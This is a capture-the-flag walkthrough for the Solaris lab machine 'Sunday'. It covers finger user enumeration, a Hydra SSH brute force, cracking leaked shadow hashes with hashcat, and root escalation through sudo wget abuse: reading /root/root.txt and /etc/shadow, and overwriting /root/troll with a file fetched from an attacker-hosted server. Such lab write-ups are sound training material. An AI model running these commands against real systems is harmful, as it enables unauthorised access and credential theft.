When I connect to a machine I usually use nmap to scan, but to learn a new tool I will use rustscan to scan all ports and then use nmap on the open ports for version detection and default scripts.
$ rustscan 10.10.10.76 --no-nmap
Open 10.10.10.76:79
Open 10.10.10.76:111
Open 10.10.10.76:515
Open 10.10.10.76:6787
Open 10.10.10.76:22022
10.10.10.76 -> [79,111,515,6787,22022]
$ nmap -sC -sV -p 79,111,515,6787,22022 -oA portscan.txt 10.10.10.76
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=10/14%Time=670D1AC0%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login
...snip..
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
Finger 79/tcp
Finger is an old protocol that displays information about the users of a machine. It can be abused to check whether a given username is valid on that machine. The protocol was designed in the 1970s and runs in cleartext.
So now we need to gather information about users on the machine. To do this we can use metasploit (auxiliary/scanner/finger/finger_users), but I will use finger-user-enum by pentestmonkey.
$ wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar -xzf finger-user-enum-1.0.tar.gz && cd finger-user-enum-1.0
# we need a list of usernames to try
# I will use this list: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
$ ./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..dhcpserv DHCP Configuration A < . . . . >..ikeuser IKE Admin < . . . . >..lp Line Printer Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
ike@10.10.10.76: ikeuser IKE Admin < . . . . >..
jo ann@10.10.10.76: Login Name TTY Idle When Where..ann ???..jo ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..mela ???..miof ???..
root@10.10.10.76: root Super-User ssh <Dec 7, 2023> 10.10.14.46 ..
sammy@10.10.10.76: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sunny@10.10.10.76: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sys@10.10.10.76: sys ??? < . . . . >..
zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???..
SSH 22022/tcp
We see three users who have logged in over SSH: root, sammy and sunny, so now we will try to brute-force SSH.
We couldn't brute-force root or sammy, but we got sunny:sunday.
$ hydra -s 22022 -t 64 -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-14 10:24:32
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1575 login tries (l:1/p:1575), ~25 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 1168 to do in 00:03h, 37 active
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
1 of 1 target successfully completed, 1 valid password found
Now we are logged in as sunny, but there is no user.txt in sunny's home, which means the user flag belongs to another user we need to find.
# ssh sunny@sunday.htb -p 22022
$ cat /etc/passwd | grep bash
root:x:0:0:Super-User:/root:/usr/bin/bash
openldap:x:75:75:OpenLDAP User:/:/usr/bin/pfbash
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
# so we need to get sammy's password
Let's keep searching the machine for anything odd. We find a .bash_history containing the commands that were run:
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
# let's see what sudo -l gives sunny
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
$ sudo /root/troll
testing
uid=0(root) gid=0(root)
# it prints "testing" and then the output of id as root
# we can't edit the file or even read it, and research didn't explain what it is
# so we keep looking at /backup
/backup$ ls -la
-rw-r--r-- 1 root root 319 Dec 19 2021 agent22.backup
-rw-r--r-- 1 root root 319 Dec 19 2021 shadow.backup
# agent22.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
# shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
# they are identical
We have sammy's hash; to know which hashing algorithm was used we look at the $id prefix:
$1$ is MD5 | $2a$ is Blowfish | $2y$ is Blowfish | $5$ is SHA-256 | $6$ is SHA-512 | $y$ is yescrypt
Now that we know it is SHA-256 (sha256crypt), we will use hashcat.
To find the hashcat mode we look at the example hashes on the hashcat website. Searching for SHA-256 does not show a hash that looks like ours, but searching for $5$ gives "sha256crypt $5$, SHA256 (Unix) 2", mode 7400.
For a faster result run it on your bare-metal OS; since I have Windows I ran it there and it took less than a second to crack (hashcat with rockyou.txt).
For privilege escalation there are several ways to do it, and I will try to write about all of them.
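As an added example (not part of the original writeup), here is a small Python parser for shadow-format lines like the backup above: it splits the nine fields, tells real hashes apart from locked (*LK*) and no-password (NP) entries, and maps the $id$ prefix to the algorithm and hashcat mode from the table above, including the $5$rounds=N$ form that root's hash uses. Mode 7400 is from the page; the modes for $1$, $2*$ and $6$ are hashcat's documented modes and are assumed here.

```python
import re
from dataclasses import dataclass
from typing import Optional

# crypt(3) $id$ prefix -> (algorithm, hashcat mode). 7400 is from the page;
# 500, 3200 and 1800 are hashcat's documented modes (assumed here).
CRYPT_IDS = {
    "1": ("md5crypt (MD5)", 500),
    "2a": ("bcrypt (Blowfish)", 3200),
    "2b": ("bcrypt (Blowfish)", 3200),
    "2y": ("bcrypt (Blowfish)", 3200),
    "5": ("sha256crypt (SHA-256)", 7400),
    "6": ("sha512crypt (SHA-512)", 1800),
    "y": ("yescrypt", None),
}

@dataclass
class ShadowEntry:
    user: str
    status: str                       # "hash", "locked", "no-password", "empty" or "unknown"
    algorithm: Optional[str] = None
    hashcat_mode: Optional[int] = None
    rounds: Optional[int] = None
    last_change_days: Optional[int] = None   # field 3: days since epoch of last change

def parse_shadow_line(line: str) -> ShadowEntry:
    """Parse one user:pw:lastchg:min:max:warn:inact:expire:flag line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError(f"not a shadow line: {line!r}")
    user, pw = fields[0], fields[1]
    lastchg = int(fields[2]) if len(fields) > 2 and fields[2].isdigit() else None
    if pw == "":
        return ShadowEntry(user, "empty", last_change_days=lastchg)
    if pw == "NP":                    # Solaris: no password set
        return ShadowEntry(user, "no-password", last_change_days=lastchg)
    if pw.startswith(("*", "!")):     # *LK*, *, !, ... : login locked
        return ShadowEntry(user, "locked", last_change_days=lastchg)
    m = re.match(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?", pw)
    if not m:
        return ShadowEntry(user, "unknown", last_change_days=lastchg)
    algo, mode = CRYPT_IDS.get(m.group(1), (f"unknown id ${m.group(1)}$", None))
    rounds = int(m.group(2)) if m.group(2) else None
    return ShadowEntry(user, "hash", algo, mode, rounds, lastchg)

def hashed_entries(text: str):
    """Entries that carry a real hash, i.e. the accounts a leaked backup actually exposes."""
    entries = (parse_shadow_line(l) for l in text.splitlines() if l.strip())
    return [e for e in entries if e.status == "hash"]
```

Run over the shadow.backup lines above, only sammy and sunny come back as hashed entries; every other account is locked or has no password, so a leaked copy of that backup exposes exactly those two.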
#1 Sudo all
$ sudo -l
User sammy may run the following commands on sunday:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wget
# if we can run anything as root, we can simply start a root bash
$ sudo /bin/bash
root@sunday:/home/sammy# wc /root/root.txt
1 1 33 /root/root.txt
#2 wget
When we see binaries we can run as root, we look them up on GTFOBins to see what can be done with them.
# For a quick win we can read /root/root.txt (the flag)
$ sudo wget -i /root/root.txt
--2024-10-14 15:51:22-- http://456efbda87744c9fe91f7358645a8c08/
# the flag appears between the slashes of the URL
# we can also read /etc/shadow and then crack root's password
$ sudo wget -i /etc/shadow
--2024-10-14 15:41:18-- ftp://root/$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553
=> ‘Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553’
# $5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3 is root's hash
########
# we can also download files with wget
# so what if we use it to overwrite /root/troll and get a root shell as sunny
# I think that was the intended path for the box
# create a file named "troll" on the attacking machine, then start a Python file server
# python3 -m http.server 8000
# set up two terminals like this: run sammy's command, then quickly run sunny's
sammy$ sudo wget -i http://10.10.16.8:8000/troll -O /root/troll
sunny$ sudo /root/troll
# and we would get a root shell on sunny's terminal
As root we can read 4 files:
root.txt : flag
troll : the file that sunny can run as root
troll.original : a backup file of troll
overwrite : a script that runs every 5 seconds and restores troll from troll.original